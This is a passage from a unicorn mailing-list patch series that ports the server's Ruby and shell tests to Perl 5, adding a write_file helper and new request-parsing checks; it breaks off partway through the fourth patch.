unicorn Ruby/Rack server user+dev discussion/patches/pulls/bugs/help
* [PATCH 0/5] more tests to Perl 5 for stability
@ 2024-05-06 20:10  Eric Wong
From: Eric Wong @ 2024-05-06 20:10 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1394 bytes --]

It's far easier to maintain tests in a language that's been
"dead" for 20 years :P  This is another step towards freeing us
up to make more internal changes, and it avoids slow Ruby
startup overhead, too.  (Perl 5 startup is slow as well, but not
nearly as slow as Ruby's.)

Eric Wong (5):
  GNUmakefile: build writes shebang-modified files
  t/*.t: use write_file helper function
  tests: port broken-app test to Perl 5
  tests: move test/unit/test_request.rb to Perl 5
  port test/unit/test_ccc.rb to Perl 5

 GNUmakefile                 |   1 +
 t/active-unix-socket.t      |  13 +--
 t/broken-app.ru             |  13 ---
 t/client_body_buffer_size.t |   5 +-
 t/heartbeat-timeout.t       |   4 +-
 t/integration.ru            |  11 +++
 t/integration.t             | 128 +++++++++++++++++++++++++--
 t/lib.perl                  |   2 +-
 t/reload-bad-config.t       |  17 ++--
 t/reopen-logs.t             |   5 +-
 t/t0009-broken-app.sh       |  56 ------------
 t/winch_ttin.t              |   7 +-
 t/working_directory.t       |  16 +---
 test/unit/test_ccc.rb       |  92 -------------------
 test/unit/test_request.rb   | 170 ------------------------------------
 15 files changed, 153 insertions(+), 387 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh
 delete mode 100644 test/unit/test_ccc.rb
 delete mode 100644 test/unit/test_request.rb

[-- Attachment #2: 0001-GNUmakefile-build-writes-shebang-modified-files.patch --]
[-- Type: text/x-diff, Size: 772 bytes --]

From 5e9dbfd071aa939677aaf3d269115fb88e606311 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:35 +0000
Subject: [PATCH 1/5] GNUmakefile: build writes shebang-modified files

This makes it easier to run individual integration tests via
prove(1) rather than all at once with gmake(1).
---
 GNUmakefile | 1 +
 1 file changed, 1 insertion(+)

diff --git a/GNUmakefile b/GNUmakefile
index 70e7e10..227842c 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -78,6 +78,7 @@ man1_bins := $(addsuffix .1, $(base_bins))
 man1_paths := $(addprefix man/man1/, $(man1_bins))
 tmp_bins = $(addprefix $(tmp_bin)/, unicorn unicorn_rails)
 pid := $(shell echo $$PPID)
+build: $(tmp_bins)
 
 $(tmp_bin)/%: bin/% | $(tmp_bin)
 	$(INSTALL) -m 755 $< $@.$(pid)

[-- Attachment #3: 0002-t-.t-use-write_file-helper-function.patch --]
[-- Type: text/x-diff, Size: 8088 bytes --]

From 9cbf87fd110acc36c3b6eec14231aed3be78ecf4 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:36 +0000
Subject: [PATCH 2/5] t/*.t: use write_file helper function

This shortens the tests a bit for readability.
---
 t/active-unix-socket.t      | 13 +++----------
 t/client_body_buffer_size.t |  5 ++---
 t/heartbeat-timeout.t       |  4 +---
 t/integration.t             |  5 ++---
 t/reload-bad-config.t       | 17 ++++++-----------
 t/reopen-logs.t             |  5 +----
 t/winch_ttin.t              |  7 ++-----
 t/working_directory.t       | 16 ++++------------
 8 files changed, 21 insertions(+), 51 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index ff731b5..ab3c973 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -11,29 +11,22 @@ END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 {
-	open my $fh, '>', "$tmpdir/u1.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u1.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
 stderr_path "$err_log"
 EOM
-	close $fh;
-
-	open $fh, '>', "$tmpdir/u2.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u2.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u2"
 stderr_path "$tmpdir/err2.log"
 EOM
-	close $fh;
 
-	open $fh, '>', "$tmpdir/u3.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u3.conf.rb", <<EOM;
 pid "$tmpdir/u3.pid"
 listen "$u1"
 stderr_path "$tmpdir/err3.log"
 EOM
-	close $fh;
 }
 
 my @uarg = qw(-D -E none t/integration.ru);
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index d479901..c8e871d 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -4,11 +4,10 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 client_body_buffer_size 0
 EOM
+$conf_fh->autoflush(1);
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $u_conf);
diff --git a/t/heartbeat-timeout.t b/t/heartbeat-timeout.t
index 694867a..0ae0764 100644
--- a/t/heartbeat-timeout.t
+++ b/t/heartbeat-timeout.t
@@ -6,14 +6,12 @@ use autodie;
 use Time::HiRes qw(clock_gettime CLOCK_MONOTONIC);
 mkdir "$tmpdir/alt";
 my $srv = tcp_server();
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 preload_app true
 stderr_path "$err_log"
 timeout 3 # WORST FEATURE EVER
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none t/heartbeat-timeout.ru -c), $u_conf, { 3 => $srv });
 
diff --git a/t/integration.t b/t/integration.t
index d17ace0..93480fa 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -18,13 +18,12 @@ if ('ensure Perl does not set SO_KEEPALIVE by default') {
 	$val = getsockopt($srv, SOL_SOCKET, SO_KEEPALIVE);
 }
 my $t0 = time;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
 my $u1 = "$tmpdir/u1";
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 early_hints true
 listen "$u1"
 EOM
+$conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
 local $ENV{NO_PROXY} = '*'; # for curl
diff --git a/t/reload-bad-config.t b/t/reload-bad-config.t
index c023b88..4c17968 100644
--- a/t/reload-bad-config.t
+++ b/t/reload-bad-config.t
@@ -6,32 +6,27 @@ use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $ru = "$tmpdir/config.ru";
-my $u_conf = "$tmpdir/u.conf.rb";
 
-open my $fh, '>', $ru;
-print $fh <<'EOM';
+write_file '>', $ru, <<'EOM';
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 config = ru = "hello world\n" # check for config variable conflicts, too
 run lambda { |env| [ 200, {}, [ ru.to_s ] ] }
 EOM
-close $fh;
 
-open $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 preload_app true
 stderr_path "$err_log"
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none -c), $u_conf, $ru, { 3 => $srv });
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid at start');
 is($bdy, "hello world\n", 'body matches expected');
 
-open $fh, '>>', $ru;
-say $fh '....this better be a syntax error in any version of ruby...';
-close $fh;
+write_file '>>', $ru, <<'EOM';
+....this better be a syntax error in any version of ruby...
+EOM
 
 $ar->do_kill('HUP'); # reload
 my @l;
@@ -42,7 +37,7 @@ for (1..1000) {
 }
 diag slurp($err_log) if $ENV{V};
 ok(grep(/error reloading/, @l), 'got error reloading');
-open $fh, '>', $err_log;
+open my $fh, '>', $err_log; # truncate
 close $fh;
 
 ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/reopen-logs.t b/t/reopen-logs.t
index 76a4dbd..14bc6ef 100644
--- a/t/reopen-logs.t
+++ b/t/reopen-logs.t
@@ -4,14 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
-my $u_conf = "$tmpdir/u.conf.rb";
 my $out_log = "$tmpdir/out.log";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 stderr_path "$err_log"
 stdout_path "$out_log"
 EOM
-close $fh;
 
 my $auto_reap = unicorn('-c', $u_conf, 't/reopen-logs.ru', { 3 => $srv } );
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/winch_ttin.t b/t/winch_ttin.t
index c507959..3a3d430 100644
--- a/t/winch_ttin.t
+++ b/t/winch_ttin.t
@@ -4,13 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 use POSIX qw(mkfifo);
-my $u_conf = "$tmpdir/u.conf.rb";
 my $u_sock = "$tmpdir/u.sock";
 my $fifo = "$tmpdir/fifo";
 mkfifo($fifo, 0666) or die "mkfifo($fifo): $!";
 
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 listen "$u_sock"
 stderr_path "$err_log"
@@ -19,11 +17,10 @@ after_fork do |server, worker|
   File.open("$fifo", "wb") { |fp| fp.syswrite worker.nr.to_s }
 end
 EOM
-close $fh;
 
 unicorn('-D', '-c', $u_conf, 't/integration.ru')->join;
 is($?, 0, 'daemonized properly');
-open $fh, '<', "$tmpdir/pid";
+open my $fh, '<', "$tmpdir/pid";
 chomp(my $pid = <$fh>);
 ok(kill(0, $pid), 'daemonized PID works');
 my $quit = sub { kill('QUIT', $pid) if $pid; $pid = undef };
diff --git a/t/working_directory.t b/t/working_directory.t
index f9254eb..f1c0a35 100644
--- a/t/working_directory.t
+++ b/t/working_directory.t
@@ -5,15 +5,13 @@ use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 mkdir "$tmpdir/alt";
 my $ru = "$tmpdir/alt/config.ru";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$pid_file"
 preload_app true
 stderr_path "$err_log"
 working_directory "$tmpdir/alt" # the whole point of this test
 before_fork { |_,_| \$master_ppid = Process.ppid }
 EOM
-close $fh;
 
 my $common_ru = <<'EOM';
 use Rack::ContentLength
@@ -21,12 +19,10 @@ use Rack::ContentType, 'text/plain'
 run lambda { |env| [ 200, {}, [ "#{$master_ppid}\n" ] ] }
 EOM
 
-open $fh, '>', $ru;
-print $fh <<EOM;
+write_file '>', $ru, <<EOM;
 #\\--daemonize --listen $u_sock
 $common_ru
 EOM
-close $fh;
 
 unicorn('-c', $u_conf)->join; # will daemonize
 chomp($daemon_pid = slurp($pid_file));
@@ -39,9 +35,7 @@ check_stderr;
 
 if ('test without CLI switches in config.ru') {
 	truncate $err_log, 0;
-	open $fh, '>', $ru;
-	print $fh $common_ru;
-	close $fh;
+	write_file '>', $ru, $common_ru;
 
 	unicorn('-D', '-l', $u_sock, '-c', $u_conf)->join; # will daemonize
 	chomp($daemon_pid = slurp($pid_file));
@@ -68,8 +62,7 @@ if ('ensures broken working_directory (missing config.ru) is OK') {
 if ('fooapp.rb (not config.ru) works with working_directory') {
 	truncate $err_log, 0;
 	my $fooapp = "$tmpdir/alt/fooapp.rb";
-	open $fh, '>', $fooapp;
-	print $fh <<EOM;
+	write_file '>', $fooapp, <<EOM;
 class Fooapp
   def self.call(env)
     b = "dir=#{Dir.pwd}"
@@ -78,7 +71,6 @@ class Fooapp
   end
 end
 EOM
-	close $fh;
 	my $srv = tcp_server;
 	my $auto_reap = unicorn(qw(-c), $u_conf, qw(-I. fooapp.rb),
 				{ -C => '/', 3 => $srv });
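
The `write_file` helper these hunks switch to is defined in t/lib.perl,
which is not shown in this series.  A minimal sketch of what such a
helper might look like (the real definition may differ) is:

```perl
use v5.14;
use autodie;            # open failures die, as in the tests above
use File::Temp qw(tempdir);

# Hypothetical sketch of a write_file helper: takes an open mode
# ('>' or '>>'), a path, and the contents; returns the filehandle so
# callers may tweak it (e.g. $fh->autoflush(1)) before it is closed.
sub write_file {
	my ($mode, $path, @contents) = @_;
	open my $fh, $mode, $path;
	print $fh @contents;
	$fh; # flushed and closed once the last reference is dropped
}

my $tmpdir = tempdir(CLEANUP => 1);
write_file '>', "$tmpdir/u1.conf.rb", <<EOM;
listen "$tmpdir/u1.sock"
EOM
```

Returning the handle keeps the one-liner form used in the hunks above
while still allowing the $conf_fh->autoflush(1) calls seen in
client_body_buffer_size.t and integration.t.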

[-- Attachment #4: 0003-tests-port-broken-app-test-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4208 bytes --]

From e61a1152a613032927613b805a46c4d831bad00c Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:37 +0000
Subject: [PATCH 3/5] tests: port broken-app test to Perl 5

Save some inodes and startup time by folding it into the
integration test.
---
 t/broken-app.ru       | 13 ----------
 t/integration.ru      |  1 +
 t/integration.t       | 18 +++++++++++++-
 t/lib.perl            |  2 +-
 t/t0009-broken-app.sh | 56 -------------------------------------------
 5 files changed, 19 insertions(+), 71 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh

diff --git a/t/broken-app.ru b/t/broken-app.ru
deleted file mode 100644
index 5966bff..0000000
--- a/t/broken-app.ru
+++ /dev/null
@@ -1,13 +0,0 @@
-# frozen_string_literal: false
-# we do not want Rack::Lint or anything to protect us
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
-map "/" do
-  run lambda { |env| [ 200, {}, [ "OK\n" ] ] }
-end
-map "/raise" do
-  run lambda { |env| raise "BAD" }
-end
-map "/nil" do
-  run lambda { |env| nil }
-end
diff --git a/t/integration.ru b/t/integration.ru
index 6df481c..3a0d99c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -100,6 +100,7 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/nil'; nil
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 93480fa..c9a7877 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -122,7 +122,23 @@ check_stderr;
 ($status, $hdr, $bdy) = do_req($srv, 'GET /broken_app HTTP/1.0');
 like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on broken endpoint');
 is($bdy, undef, 'no response body after exception');
-truncate($errfh, 0);
+seek $errfh, 0, SEEK_SET;
+{
+	my $nxt;
+	while (!defined($nxt) && defined($_ = <$errfh>)) {
+		$nxt = <$errfh> if /app error/;
+	}
+	ok $nxt, 'got app error' and
+		like $nxt, qr/\bintegration\.ru/, 'got backtrace';
+}
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
+
+($status, $hdr, $bdy) = do_req($srv, 'GET /nil HTTP/1.0');
+like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on nil endpoint');
+like slurp($err_log), qr/app error/, 'exception logged for nil';
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
 
 my $ck_early_hints = sub {
 	my ($note) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index 8c842b1..382f08c 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -30,7 +30,7 @@ $pid_file = "$tmpdir/pid";
 $fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
-open($errfh, '>>', $err_log);
+open($errfh, '+>>', $err_log);
 
 if (my $t = $ENV{TAIL}) {
 	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
diff --git a/t/t0009-broken-app.sh b/t/t0009-broken-app.sh
deleted file mode 100755
index 895b178..0000000
--- a/t/t0009-broken-app.sh
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-
-t_plan 9 "graceful handling of broken apps"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -E none -D broken-app.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "normal response is alright" && {
-	test xOK = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "app raised exception" && {
-	curl -sSf http://$listen/raise 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged and backtrace not swallowed" && {
-	grep -F 'app error' $r_err
-	grep -A1 -F 'app error' $r_err | tail -1 | grep broken-app.ru:
-	dbgcat r_err
-	> $r_err
-}
-
-t_begin "trigger bad response" && {
-	curl -sSf http://$listen/nil 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged" && {
-	grep -F 'app error' $r_err
-	> $r_err
-}
-
-t_begin "normal responses alright afterwards" && {
-	> $tmp
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	wait
-	test xOK = x$(sort < $tmp | uniq)
-}
-
-t_begin "teardown" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && check_stderr
-
-t_done
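
The deleted shell test checked the backtrace with
`grep -A1 -F 'app error'`; the Perl replacement in integration.t scans
the error log for the line following the first "app error" match.  In
isolation (with invented sample log lines) the pattern looks like:

```perl
use v5.14;

# Grab the line after the first "app error" line, mirroring
# `grep -A1 -F 'app error' | tail -1` from the removed shell test.
# These sample log lines are made up for illustration.
my @log = (
	"worker=0 ready\n",
	"app error: hello (RuntimeError)\n",
	"t/integration.ru:103:in `block in <main>'\n",
);
my $nxt;
for my $i (0 .. $#log) {
	if (!defined($nxt) && $log[$i] =~ /app error/) {
		$nxt = $log[$i + 1];
	}
}
```

The real test reads $errfh line-by-line instead of an array, but the
"remember the line after the match" logic is the same.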

[-- Attachment #5: 0004-tests-move-test-unit-test_request.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11298 bytes --]

From 01224642a20e91de5ea18c6f20856142158068a8 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:38 +0000
Subject: [PATCH 4/5] tests: move test/unit/test_request.rb to Perl 5

Another step towards having more freedom to change our internals
and having a more stable language for tests to reduce
maintenance overhead by avoiding Ruby incompatibilities.
---
 t/integration.ru          |   6 ++
 t/integration.t           |  72 +++++++++++++++-
 test/unit/test_request.rb | 170 --------------------------------------
 3 files changed, 75 insertions(+), 173 deletions(-)
 delete mode 100644 test/unit/test_request.rb

diff --git a/t/integration.ru b/t/integration.ru
index 3a0d99c..a6b022a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,7 @@ def env_dump(env)
     else
       case k
       when 'rack.version', 'rack.after_reply'; h[k] = v
+      when 'rack.input'; h[k] = v.class.to_s
       end
     end
   end
@@ -112,6 +113,11 @@ def rack_input_tests(env)
   when 'PUT'
     case env['PATH_INFO']
     when %r{\A/rack_input}; rack_input_tests(env)
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
+    end
+  when 'OPTIONS'
+    case env['REQUEST_URI']
+    when '*'; [ 200, {}, [ env_dump(env) ] ]
     end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index c9a7877..3b1d6df 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -103,14 +103,75 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	($status, $hdr, my $json) = do_req $srv, 'GET /env_dump';
+	my $get_json = sub {
+		my (@req) = @_;
+		my @r = do_req $srv, @req;
+		my $env = eval { JSON::PP->new->decode($r[2]) };
+		diag "$@ (r[2]=$r[2])" if $@;
+		is ref($env), 'HASH', "@req response body is JSON";
+		(@r, $env)
+	};
+	($status, $hdr, my $json, my $env) = $get_json->('GET /env_dump');
 	is($status, undef, 'no status for HTTP/0.9');
 	is($hdr, undef, 'no header for HTTP/0.9');
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
-	my $env = JSON::PP->new->decode($json);
-	is(ref($env), 'HASH', 'JSON decoded body to hashref');
 	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+	is $env->{'rack.url_scheme'}, 'http', 'rack.url_scheme default';
+	is $env->{'rack.input'}, 'StringIO', 'StringIO for no content';
+
+	my $req = 'OPTIONS *';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '', "$req => PATH_INFO";
+	is $env->{REQUEST_URI}, '*', "$req => REQUEST_URI";
+
+	$req = 'GET http://e:3/env_dump?y=z';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'y=z', "$req => QUERY_STRING";
+
+	$req = 'GET http://e:3/env_dump#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, '', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	$req = 'GET http://e:3/env_dump?a=b#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'a=b', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	for my $proto (qw(https http)) {
+		$req = "X-Forwarded-Proto: $proto";
+		($status, $hdr, $json, $env) = $get_json->(
+						"GET /env_dump HTTP/1.0\r\n".
+						"X-Forwarded-Proto: $proto");
+		is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+		is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+		is $env->{'rack.url_scheme'}, $proto, "$req => rack.url_scheme";
+	}
+
+	$req = 'X-Forwarded-Proto: ftp'; # invalid proto
+	($status, $hdr, $json, $env) = $get_json->(
+					"GET /env_dump HTTP/1.0\r\n".
+					"X-Forwarded-Proto: ftp");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{'rack.url_scheme'}, 'http', "$req => rack.url_scheme";
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 0');
+	is $env->{'rack.input'}, 'StringIO', 'content-length: 0 uses StringIO';
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 1');
+	is $env->{'rack.input'}, 'Unicorn::TeeInput',
+		'content-length: 1 uses TeeInput';
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
@@ -179,6 +240,11 @@ if ('bad requests') {
 	($status, $hdr) = do_req $srv, 'GET /env_dump HTTP/1/1';
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
+	for my $abs_uri (qw(ssh+http://e/ ftp://e/x http+ssh://e/x)) {
+		($status, $hdr) = do_req $srv, "GET $abs_uri HTTP/1.0";
+		like $status, qr!\AHTTP/1\.[01] 400 \b!, "400 on $abs_uri";
+	}
+
 	$c = tcp_start($srv);
 	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
deleted file mode 100644
index 9d1b350..0000000
--- a/test/unit/test_request.rb
+++ /dev/null
@@ -1,170 +0,0 @@
-# -*- encoding: binary -*-
-# frozen_string_literal: false
-
-# Copyright (c) 2009 Eric Wong
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-
-require './test/test_helper'
-
-include Unicorn
-
-class RequestTest < Test::Unit::TestCase
-
-  MockRequest = Class.new(StringIO)
-
-  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
-
-  def setup
-    @request = HttpRequest.new
-    @app = lambda do |env|
-      [ 200, { 'content-length' => '0', 'content-type' => 'text/plain' }, [] ]
-    end
-    @lint = Rack::Lint.new(@app)
-  end
-
-  def test_options
-    client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '', env['REQUEST_PATH']
-    assert_equal '', env['PATH_INFO']
-    assert_equal '*', env['REQUEST_URI']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query
-    client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'y=z', env['QUERY_STRING']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_fragment
-    client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal '', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query_and_fragment
-    client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'a=b', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_unsupported_schemes
-    %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
-      client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
-                               "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
-    end
-  end
-
-  def test_x_forwarded_proto_https
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: https\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "https", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_http
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: http\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_invalid
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: ftp\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_get
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_equal '127.0.0.1', env['REMOTE_ADDR']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_no_content_stringio
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_zero_content_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 0\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_real_content_not_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal Unicorn::TeeInput, env['rack.input'].class
-  end
-
-  def test_rack_lint_put
-    client = MockRequest.new(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: 5\r\n" \
-      "\r\n" \
-      "abcde")
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_big_put
-    count = 100
-    bs = 0x10000
-    buf = (' ' * bs).freeze
-    length = bs * count
-    client = Tempfile.new('big_put')
-    client.syswrite(
